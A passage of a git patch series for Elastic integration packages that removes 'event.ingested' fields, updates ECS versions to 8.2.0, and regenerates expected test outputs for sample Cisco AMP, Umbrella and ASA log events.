@@ -3660,7 +3616,6 @@ ], "code": "1107296274", "id": "1476905066250000100", - "ingested": "2022-02-02T05:53:29.530545339Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1476905066250000100,\"timestamp\":1610621237,\"timestamp_nanoseconds\":250000000,\"date\":\"2021-01-14T10:47:17+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610621237,\"start_date\":\"2021-01-14T10:47:17+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Command_Line_Arguments_Kovter\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"b6:9c:d0:89:b8:66\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. 
Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff\"}}}}}", "severity": 3, 
@@ -3747,7 +3702,6 @@ ], "code": "1107296274", "id": "1476905066228000300", - "ingested": "2022-02-02T05:53:29.530546328Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1476905066228000300,\"timestamp\":1610621237,\"timestamp_nanoseconds\":228000000,\"date\":\"2021-01-14T10:47:17+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1610621237,\"start_date\":\"2021-01-14T10:47:17+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Command_Line_Arguments_Kovter\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"b6:9c:d0:89:b8:66\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Microsoft Word launched PowerShell. 
This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.\",\"short_description\":\"W32.WinWord.Powershell\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWoW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"8133502266008b77de7921451e1210b0ef3f0ed2db7d8d3ee0c3350d856fa6fa\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9d52813a48adcad9eb9df2768aaca43924d503cda2de26b27133d6e3654077ff\"}}}}}", "severity": 2, 
@@ -3831,7 +3785,6 @@ ], "code": "2164260893", "id": "6411425813945647000", - "ingested": "2022-02-02T05:53:29.530547319Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411425813945647106\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}", "severity": 3 
@@ -3903,7 +3856,6 @@ ], "code": "553648155", "id": "6411425813945647000", - "ingested": "2022-02-02T05:53:29.530548322Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":758000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6411425813945647105\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}", "severity": 3 
@@ -3977,7 +3929,6 @@ ], "code": "553648147", "id": "6411425813945647000", - "ingested": "2022-02-02T05:53:29.530549314Z", "kind": "alert", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411425813945647000,\"timestamp\":1610620426,\"timestamp_nanoseconds\":742000000,\"date\":\"2021-01-14T10:33:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.12081E6CA3-95.SBX.TG\",\"detection_id\":\"6411425813945647106\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"AySxs.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Documents\\\\AySxs.exe\",\"identity\":{\"sha256\":\"12081e6ca366ad7d08368fbc7d4107605a9b75d27c671e7e0a58588f94be5837\"}}}}", "severity": 3 diff --git a/packages/cisco_secure_endpoint/data_stream/event/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_secure_endpoint/data_stream/event/elasticsearch/ingest_pipeline/default.yml index cb8d2c4f94c..a656dcfb7b3 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cisco_secure_endpoint/data_stream/event/elasticsearch/ingest_pipeline/default.yml 
@@ -35,9 +35,6 @@ processors: ####################### ## ECS Event Mapping ## ####################### -- set: - field: event.ingested - value: '{{_ingest.timestamp}}' - set: field: ecs.version value: '8.2.0' diff --git a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-cloudfirewalllogs.log-expected.json b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-cloudfirewalllogs.log-expected.json index f98cd40bf11..e69ee4c688f 100644 --- a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-cloudfirewalllogs.log-expected.json +++ b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-cloudfirewalllogs.log-expected.json @@ -30,7 +30,6 @@ }, "event": { "category": "network", - "ingested": "2022-02-03T13:00:19.421779927Z", "original": "2020-07-23 18:03:46,[211039844],Passive Monitor,CDFW Tunnel Device,OUTBOUND,1,84,172.17.3.4,,67.43.156.12,,ams1.edc,12,ALLOW", "type": [ "allowed" @@ -102,7 +101,6 @@ }, "event": { "category": "network", - "ingested": "2022-02-03T13:00:19.421785901Z", "original": "2020-07-23 18:03:46,[211039844],Passive Monitor,CDFW Tunnel Device,INBOUND,1,84,172.17.3.4,,67.43.156.12,,ams1.edc,12,BLOCK", "type": [ "denied" diff --git a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-dnslogs.log-expected.json b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-dnslogs.log-expected.json index f723b31a025..26d6ccb2b8e 100644 --- a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-dnslogs.log-expected.json +++ b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-dnslogs.log-expected.json 
@@ -47,7 +47,6 @@ "event": { "action": "dns-request-Allowed", "category": "network", - "ingested": "2022-02-03T13:00:20.465652573Z", "original": "\"2020-07-23 23:49:54\",\"elasticuser\",\"elasticuser2,some other identity\",\"192.168.1.1\",\"81.2.69.144\",\"Allowed\",\"1 (A)\",\"NOERROR\",\"elastic.co.\",\"Software/Technology,Business Services,Application\",\"Test Policy Name\",\"SomeIdentityType\",\"\"", "type": [ "allowed", @@ -135,7 +134,6 @@ "event": { "action": "dns-request-Blocked", "category": "network", - "ingested": "2022-02-03T13:00:20.465653868Z", "original": "\"2020-07-23 23:50:25\",\"elasticuser\",\"elasticuser2,some other identity\",\"192.168.1.1\",\"67.43.156.12\",\"Blocked\",\"1 (A)\",\"NOERROR\",\"elastic.co.\",\"Chat,Instant Messaging,Block List,Application\",\"Test Policy Name\",\"SomeIdentityType\",\"BlockedCategories\"", "type": [ "denied", @@ -217,7 +215,6 @@ "event": { "action": "dns-request-Allowed", "category": "network", - "ingested": "2022-02-03T13:00:20.465654255Z", "original": "\"2021-05-14 19:39:58\",\"elastic_machine\",\"elastic_machine,Elastic User (ElasticUser@elastic.co)\",\"67.43.156.12\",\"81.2.69.144\",\"Allowed\",\"1 (A)\",\"NOERROR\",\"elastic.co.\",\"Infrastructure\",\"Roaming Computers\",\"Roaming Computers,AD Users\",\"\"", "type": [ "allowed", diff --git a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-iplogs.log-expected.json b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-iplogs.log-expected.json index 86fccef0590..b752261888b 100644 --- a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-iplogs.log-expected.json +++ b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-iplogs.log-expected.json @@ -29,7 +29,6 @@ }, "event": { "category": "network", - "ingested": "2022-02-03T13:00:21.572805576Z", "original": "\"2020-08-26 20:32:46\",\"elasticuser\",\"192.168.1.1\",\"0\",\"81.2.69.144\",\"0\",\"Test Category\"" }, "log": { 
@@ -89,7 +88,6 @@ }, "event": { "category": "network", - "ingested": "2022-02-03T13:00:21.572807422Z", "original": "\"2020-08-26 20:32:45\",\"elasticuser\",\"192.168.1.1\",\"61095\",\"81.2.69.144\",\"445\",\"Test Category\"" }, "log": { diff --git a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-proxylogs.log-expected.json b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-proxylogs.log-expected.json index 83a2b73937e..07ee992beb5 100644 --- a/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-proxylogs.log-expected.json +++ b/packages/cisco_umbrella/data_stream/log/_dev/test/pipeline/test-umbrella-proxylogs.log-expected.json @@ -34,7 +34,6 @@ }, "event": { "category": "network", - "ingested": "2022-02-03T13:00:21.965624301Z", "original": "\"2020-07-23 23:48:56\",\"elasticuser\",\"someotheruser\",\"192.168.1.1\",\"67.43.156.12\",\"81.2.69.144\",\"\",\"ALLOWED\",\"https://elastic.co/blog/ext_id=Anyclip\",\"https://google.com/elastic\",\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36\",\"200\",\"850\",\"\",\"\",\"\",\"Business Services\",\"AVDetectionName\",\"Malicious\",\"MalwareName\",\"\",\"\",\"Roaming Computers\",\"\"", "type": [ "allowed" @@ -120,7 +119,6 @@ }, "event": { "category": "network", - "ingested": "2022-02-03T13:00:21.965626189Z", "original": "\"2020-07-23 23:48:56\",\"elasticuser\",\"someotheruser\",\"192.168.1.1\",\"67.43.156.12\",\"81.2.69.144\",\"\",\"BLOCKED\",\"https://elastic.co/blog/ext_id=Anyclip\",\"https://google.com/elastic\",\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36\",\"200\",\"850\",\"\",\"\",\"\",\"Business Services\",\"AVDetectionName\",\"Malicious\",\"MalwareName\",\"\",\"\",\"Roaming Computers\",\"\"", "type": [ "denied" 
@@ -186,7 +184,6 @@ }, "event": { "category": "network", - "ingested": "2022-02-03T13:00:21.965626568Z", "original": "\"2017-10-02 23:52:53\",\"elasticuser\",\"ActiveDirectoryUserName,ADSite,Network\",\"192.168.192.135\",\"67.43.156.12\",\"\",\"\",\"ALLOWED\",\"http://google.com/the.js\",\"www.google.com\",\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36\",\"200\",\"562\",\"1489\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"\",\"Networks\"", "type": [ "allowed" diff --git a/packages/cisco_umbrella/data_stream/log/elasticsearch/ingest_pipeline/default.yml b/packages/cisco_umbrella/data_stream/log/elasticsearch/ingest_pipeline/default.yml index 3a637029907..5da5c91cf71 100644 --- a/packages/cisco_umbrella/data_stream/log/elasticsearch/ingest_pipeline/default.yml +++ b/packages/cisco_umbrella/data_stream/log/elasticsearch/ingest_pipeline/default.yml @@ -2,10 +2,6 @@ description: Pipeline for Cisco Umbrella processors: - # ECS event.ingested - - set: - field: event.ingested - value: "{{_ingest.timestamp}}" - set: field: ecs.version value: "8.2.0" From 6f4bb5dcac3b3079de1f8b07df8d49885db881d4 Mon Sep 17 00:00:00 2001 From: Taylor Swanson Date: Wed, 16 Mar 2022 11:39:03 -0500 Subject: [PATCH 20/23] Make akamai version change be minor, fix quotes --- .../item_usages/elasticsearch/ingest_pipeline/default.yml | 2 +- .../signin_attempts/elasticsearch/ingest_pipeline/default.yml | 2 +- packages/akamai/changelog.yml | 2 +- packages/akamai/manifest.yml | 2 +- 4 files changed, 4 insertions(+), 4 deletions(-) diff --git a/packages/1password/data_stream/item_usages/elasticsearch/ingest_pipeline/default.yml b/packages/1password/data_stream/item_usages/elasticsearch/ingest_pipeline/default.yml index 4475e544a00..1b6e7d384ae 100644 --- a/packages/1password/data_stream/item_usages/elasticsearch/ingest_pipeline/default.yml +++ b/packages/1password/data_stream/item_usages/elasticsearch/ingest_pipeline/default.yml 
@@ -16,7 +16,7 @@ processors:
 #######################
 - set:
 field: ecs.version
- value: '8.2.0'
+ value: "8.2.0"
 # Sets event.created from the @timestamp field generated by filebeat before being overwritten further down
 - set:
 field: event.created
diff --git a/packages/1password/data_stream/signin_attempts/elasticsearch/ingest_pipeline/default.yml b/packages/1password/data_stream/signin_attempts/elasticsearch/ingest_pipeline/default.yml
index c9c201aeeef..8f8c07dbf4d 100644
--- a/packages/1password/data_stream/signin_attempts/elasticsearch/ingest_pipeline/default.yml
+++ b/packages/1password/data_stream/signin_attempts/elasticsearch/ingest_pipeline/default.yml
@@ -16,7 +16,7 @@ processors:
 #######################
 - set:
 field: ecs.version
- value: '8.2.0'
+ value: "8.2.0"
 # Sets event.created from the @timestamp field generated by filebeat before being overwritten further down
 - set:
 field: event.created
diff --git a/packages/akamai/changelog.yml b/packages/akamai/changelog.yml
index 10c81457de1..012050a25b1 100644
--- a/packages/akamai/changelog.yml
+++ b/packages/akamai/changelog.yml
@@ -1,5 +1,5 @@
 # newer versions go on top
-- version: "0.1.2"
+- version: "0.2.0"
 changes:
 - description: Update to ECS 8.2
 type: enhancement
diff --git a/packages/akamai/manifest.yml b/packages/akamai/manifest.yml
index f22f5542838..a27c881a629 100644
--- a/packages/akamai/manifest.yml
+++ b/packages/akamai/manifest.yml
@@ -1,6 +1,6 @@
 name: akamai
 title: Akamai
-version: 0.1.2
+version: 0.2.0
 release: beta
 description: Akamai Integration
 type: integration
From 177071c865c0fa0a84da25a45cc7ae852bf7824e Mon Sep 17 00:00:00 2001
From: Taylor Swanson
Date: Tue, 5 Apr 2022 08:53:00 -0500
Subject: [PATCH 21/23] Clean up manifest after merge
---
 packages/cisco_umbrella/manifest.yml | 4 ----
 1 file changed, 4 deletions(-)
diff --git a/packages/cisco_umbrella/manifest.yml b/packages/cisco_umbrella/manifest.yml
index 5cc8dbe7b5f..7e7881e02f7 100644
--- a/packages/cisco_umbrella/manifest.yml
+++ b/packages/cisco_umbrella/manifest.yml
@@ -1,11 +1,7 @@
 format_version: 1.0.0
 name: cisco_umbrella
 title: Cisco Umbrella
-<<<<<<< HEAD
 version: 0.6.0
-=======
-version: 0.5.1
->>>>>>> main
 license: basic
 description: Collect logs from Cisco Umbrella with Elastic Agent.
 type: integration
From 45da561260c7a21588b14236fa791c6d408b4c5f Mon Sep 17 00:00:00 2001
From: Taylor Swanson
Date: Tue, 5 Apr 2022 08:59:45 -0500
Subject: [PATCH 22/23] Fix cisco_ftd changelog
---
 packages/cisco_ftd/changelog.yml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/packages/cisco_ftd/changelog.yml b/packages/cisco_ftd/changelog.yml
index 398f339557e..576d44f9699 100644
--- a/packages/cisco_ftd/changelog.yml
+++ b/packages/cisco_ftd/changelog.yml
@@ -1,7 +1,7 @@
 # newer versions go on top
 - version: "2.1.0"
 changes:
- - description: Update to ECS 8.1
+ - description: Update to ECS 8.2
 type: enhancement
 link: https://github.com/elastic/integrations/pull/2778
 - version: "2.0.1"
From ab8b9ef7dff5da0f5a5594e606dc1bbcbd25ee9f Mon Sep 17 00:00:00 2001
From: Taylor Swanson
Date: Tue, 5 Apr 2022 09:33:18 -0500
Subject: [PATCH 23/23] Regen files after merge
---
 ...test-additional-messages.log-expected.json | 16 +++++-----
 .../pipeline/test-sample.log-expected.json | 30 +++++++++----------
 2 files changed, 23 insertions(+), 23 deletions(-)
diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-additional-messages.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-additional-messages.log-expected.json
index 3f6226a1f6b..72b5f3a3e6c 100644
--- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-additional-messages.log-expected.json
+++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-additional-messages.log-expected.json
@@ -5755,7 +5755,7 @@ "asa": {} }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule",
@@ -5830,7 +5830,7 @@ "ip": "172.31.98.44" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -5925,7 +5925,7 @@ "ip": "2a02:cf40:add:4002:91f2:a9b2:e09a:6fc6" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -6024,7 +6024,7 @@ "port": 500 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -6117,7 +6117,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -6169,7 +6169,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -6221,7 +6221,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -6273,7 +6273,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", diff --git a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json index fa456dd1652..e7bbfd75d20 100644 --- a/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json +++ b/packages/cisco_asa/data_stream/log/_dev/test/pipeline/test-sample.log-expected.json @@ -5092,7 +5092,7 @@ "ip": "172.17.6.211" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -5177,7 +5177,7 @@ "port": 443 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -5287,7 +5287,7 @@ "port": 443 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -5399,7 +5399,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -5494,7 +5494,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", 
@@ -5593,7 +5593,7 @@ } }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -5686,7 +5686,7 @@ "port": 18449 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -5763,7 +5763,7 @@ "ip": "ff02::1" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -5835,7 +5835,7 @@ "port": 443 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -5924,7 +5924,7 @@ "port": 50120 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -6027,7 +6027,7 @@ "port": 443 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -6129,7 +6129,7 @@ "port": 53 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -6226,7 +6226,7 @@ "port": 53 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "flow-expiration", @@ -6333,7 +6333,7 @@ "port": 443 }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "firewall-rule", @@ -6437,7 +6437,7 @@ "ip": "81.2.69.193" }, "ecs": { - "version": "8.0.0" + "version": "8.2.0" }, "event": { "action": "deleted",